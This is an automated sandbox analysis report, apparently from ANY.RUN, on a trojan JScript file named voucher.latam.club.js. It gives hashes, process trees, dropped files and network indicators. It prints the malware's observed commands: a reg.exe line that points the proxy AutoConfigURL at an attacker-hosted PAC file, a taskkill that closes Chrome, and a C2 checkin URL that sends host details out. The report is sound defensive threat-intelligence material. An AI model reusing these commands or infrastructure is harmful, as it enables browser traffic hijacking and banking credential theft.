analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

voucher.latam.club.js

Full analysis: https://app.any.run/tasks/2f905fda-bd65-4ba0-856c-76ddfbe4e273
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: January 17, 2019, 14:01:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

830E41F4AE4E0C963D25A56ADBAA7C00

SHA1:

2D71107CCB22C070EEC2BEDA9D988595EB1E92BF

SHA256:

1380637C9C9D476491744400220C0E287EFC746894519894295698486BA31BF7

SSDEEP:

384:YAejlYzbZKfaiabDhvgsULx+kh/XACbVUi8g8LVrdpay0:FVbIfalfd6UkhPAyei8g8LVrOy0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to CnC server

      • wscript.exe (PID: 2540)
  • SUSPICIOUS

    • Executes scripts

      • WScript.exe (PID: 2972)
      • wscript.exe (PID: 2540)
    • Application launched itself

      • wscript.exe (PID: 2540)
      • WScript.exe (PID: 2972)
    • Uses TASKKILL.EXE to kill Browsers

      • wscript.exe (PID: 2540)
    • Creates files in the user directory

      • wscript.exe (PID: 2540)
    • Uses IPCONFIG.EXE to discover IP address

      • wscript.exe (PID: 2540)
    • Uses REG.EXE to modify Windows registry

      • WScript.exe (PID: 2904)
      • wscript.exe (PID: 3176)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
8
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs wscript.exe ipconfig.exe no specs taskkill.exe no specs wscript.exe no specs reg.exe no specs wscript.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\voucher.latam.club.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2540"C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Local\Temp\voucher.latam.club.js" /isElevatedC:\Windows\System32\wscript.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
2036"C:\Windows\System32\ipconfig.exe" /flushdnsC:\Windows\System32\ipconfig.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2380"C:\Windows\System32\taskkill.exe" /f /t /im chrome.exeC:\Windows\System32\taskkill.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2904"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\udpate\dav.js" C:\Windows\System32\WScript.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1244"C:\Windows\System32\reg.exe" ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /d http://www.navegadoratt.club/mag.dat /fC:\Windows\System32\reg.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3176"C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Roaming\udpate\dav.js"C:\Windows\System32\wscript.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2312"C:\Windows\System32\reg.exe" ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /d http://www.navegadoratt.club/mag.dat /fC:\Windows\System32\reg.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
697
Read events
659
Write events
38
Delete events
0

Modification events

(PID) Process:(2972) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2972) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2540) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2540) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2540) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(2540) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2540) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4511
Value:
Open &with Command Prompt
(PID) Process:(2904) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2904) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:Key:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:AutoConfigURL
Value:
http://www.navegadoratt.club/mag.dat
Executable files
0
Suspicious files
0
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
2540wscript.exeC:\Users\admin\AppData\Roaming\udpate\external_extensions.jsontext
MD5:C3CBFF743F133E744780AC1FA4A9CD16
SHA256:74F62780EF33893A7739FFBC886D38D119091E026C711D2472CDA794A10B004A
2540wscript.exeC:\Program Files\Google\Chrome\Application\68.0.3440.106\default_apps\external_extensions.jsontext
MD5:C3CBFF743F133E744780AC1FA4A9CD16
SHA256:74F62780EF33893A7739FFBC886D38D119091E026C711D2472CDA794A10B004A
2540wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\mag[1].dattext
MD5:48136055D366EA3AE7B0C3ECC9BDFA63
SHA256:BE99A16BD083CD0DCEA0FC1130F010AFE081D24C8EB5CA473CB4FB3F4B57D48C
2540wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\controller[1].phptext
MD5:B6A4236CC40E4CA67C26D589ED44292E
SHA256:0E6EDC150DB65D1E2E3975E3A3DE640724A4D2BC7CAD5C6D5FFFA94371872A4E
2540wscript.exeC:\Users\admin\AppData\Roaming\udpate\dav.jstext
MD5:8D5A527046D06FB6396B4D984965D3AE
SHA256:E8D4FAC72269D5F4EF79441E80A246075B5E2A0C6C3E4F28D625B83E945B3486
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2540
wscript.exe
GET
200
192.243.100.181:80
http://contagempcs.xyz/mag/controller.php?role=Admin&os=Windows%207&bits=X32&av=undefined&host=USER-PC&plugins=N/A
US
text
101 b
malicious
2540
wscript.exe
GET
200
198.54.115.111:80
http://www.navegadoratt.club/mag.dat
US
text
2.01 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2540
wscript.exe
198.54.115.111:80
www.navegadoratt.club
Namecheap, Inc.
US
malicious
2540
wscript.exe
192.243.100.181:80
contagempcs.xyz
TIP Networks Inc
US
malicious

DNS requests

Domain
IP
Reputation
www.navegadoratt.club
  • 198.54.115.111
malicious
contagempcs.xyz
  • 192.243.100.181
malicious

Threats

PID
Process
Class
Message
2540
wscript.exe
A Network Trojan was detected
ET TROJAN SA Banker Checkin
2540
wscript.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] FindProxyForURL Function
No debug info